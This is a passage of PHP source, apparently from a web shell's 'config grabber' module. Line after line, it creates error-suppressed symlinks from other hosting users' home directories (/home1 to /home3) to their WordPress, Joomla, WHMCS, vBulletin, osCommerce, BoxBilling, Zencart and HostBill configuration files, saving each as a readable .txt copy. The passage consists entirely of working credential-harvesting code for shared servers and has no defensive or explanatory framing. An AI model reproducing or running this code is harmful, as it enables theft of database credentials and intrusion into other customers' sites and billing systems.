2674. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2675. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2676. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2677. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2678. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2679.  
2680. //Home2
2681.  
2682. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
2683. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
2684. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
2685. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
2686. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
2687. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
2688. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
2689. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
2690. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
2691. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
2692. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
2693. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
2694. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
2695. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
2696. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
2697. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
2698. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
2699. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
2700. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
2701. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
2702. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
2703. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
2704. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
2705. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
2706. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
2707. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
2708. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
2709. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
2710. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
2711. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
2712. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
2713. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
2714. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
2715. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
2716. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
2717. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
2718. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
2719. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
2720. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
2721. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
2722. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
2723. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
2724. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
2725. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
2726. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
2727. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
2728. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
2729. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
2730. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
2731. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2732. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2733. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
2734. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
2735. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
2736. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
2737. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
2738. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
2739. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
2740. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2741. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2742. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2743. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2744. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2745. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2746. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2747. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2748. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2749. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2750. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2751. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2752. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2753. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2754. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2755. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2756. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2757. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2758. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2759. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2760. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2761. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2762. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2763. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2764. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2765. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2766. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2767. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2768. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2769. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2770. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2771. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2772. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2773. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2774. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2775. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2776. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2777. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2778. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
2779. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2780. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2781. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2782. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2783. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2784. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2785. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2786. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2787. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2788. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2789. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2790. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2791. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2792. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2793. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2794. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2795. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2796. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2797. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2798. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2799. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2800. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2801. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2802. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2803. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2804. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2805. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
2806. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2807. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2808. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2809. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2810. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2811. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2812. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2813. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2814. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2815. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2816. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
2817. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
2818. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
2819. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
2820. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
2821. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
2822. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
2823. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
2824. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
2825. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
2826. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
2827. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
2828. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
2829. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
2830. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
2831. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
2832. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
2833. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
2834. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
2835. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
2836. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
2837. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
2838. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
2839. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
2840. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2841. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2842. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2843. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2844. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2845. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2846. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2847. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2848. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2849. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2850. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2851. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2852. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2853. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2854. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2855. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2856. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2857. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2858. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2859. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2860. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2861. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2862.  
2863. //Home3
2864.  
2865. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
2866. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
2867. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
2868. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
2869. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
2870. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
2871. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
2872. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
2873. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
2874. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
2875. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
2876. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
2877. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
2878. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
2879. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
2880. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
2881. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
2882. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
2883. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
2884. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
2885. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
2886. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
2887. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
2888. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
2889. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
2890. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
2891. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
2892. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
2893. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
2894. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
2895. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
2896. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
2897. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
2898. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
2899. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
2900. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
2901. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
2902. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
2903. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
2904. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
2905. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
2906. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
2907. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
2908. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
2909. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
2910. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
2911. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
2912. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
2913. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
2914. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2915. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2916. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
2917. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
2918. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
2919. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
2920. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
2921. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
2922. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
2923. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2924. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2925. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2926. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2927. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2928. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2929. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2930. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2931. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2932. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2933. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2934. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2935. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2936. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2937. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2938. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2939. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2940. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2941. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2942. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2943. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2944. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2945. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2946. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2947. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2948. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2949. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2950. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2951. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2952. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2953. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2954. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2955. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2956. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2957. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2958. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2959. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2960. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2961. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
2962. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2963. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2964. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2965. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2966. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2967. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2968. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2969. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2970. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2971. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2972. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2973. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2974. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2975. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2976. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2977. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2978. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2979. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2980. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2981. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2982. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2983. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2984. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2985. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2986. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2987. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2988. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
